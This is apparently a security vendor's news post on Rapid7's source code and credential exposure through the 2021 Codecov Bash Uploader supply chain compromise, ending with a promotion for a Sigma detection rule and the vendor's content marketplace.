A major cybersecurity company Rapid7 announced that a limited number of its source code repositories were exposed in course of the Codecov supply chain attack. According to the official statement, the compromised repos contained internal credentials and alert-related data for its Managed Detection and Response (MDR) clients.
On April 15, 2021, a software auditing firm Codecov disclosed that its Bash Uploader script had been backdoored by unknown actors. This script can investigate the customer’s code and access any logins and passwords within that code. Consequently, the nefarious modifications of this utility allowed adversaries to reach systems inside the Codecov users’ networks, including the product code the companies are developing and pushing out to others. Moreover, since Bash Uploader can upload data outside the customers’ networks, it provided hackers with an easy way to exfiltrate the stolen information.
The compromise occurred between January April 2021 and allowed adversaries to reach authentication tokens, keys, login details, service accounts, and other confidential information belonging to customers. As a result, hundreds of users were hit, having their data within user continuous integration (CI) environments discredited.
Rapid7 confirmed that it had fallen victim to the Codecov attack. Particularly, malicious Bash Uploader utility was installed on the company’s CI server which is utilized by the vendor to develop and test tooling for MDR customers. Although intruders had no ability to alter the product code itself, hackers managed to reach a minor set of source code repositories containing clients’ login details and other sensitive information. All the credentials have been already changed to prevent further abuse. Also, the company contacted all affected users to ensure they took appropriate mitigation steps.
To check if your organization has been abused in course of the Rapid7 breach and prevent further compromise, you can download a community Sigma rule already available in Threat Detection Marketplace.
The rule has translations to the following languages:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, LogPoint, Humio, RSA NetWitness, FireEye
Tactics: Initial Access
Techniques: Supply Chain Compromise (T1195)
Get a subscription to Threat Detection Marketplace, a world-leading Content-as-a-Service (CaaS) platform that provides qualified, cross-vendor, and cross-tool SOC content tailored to 23 market-leading SIEM, EDR, and NTDR technologies. Our content is continuously enriched with additional threat context, verified, checked for impact, efficiency, false positives, and other operational considerations through a series of quality assurance audits. Want to craft your own detection content? Join our Threat Bounty Program!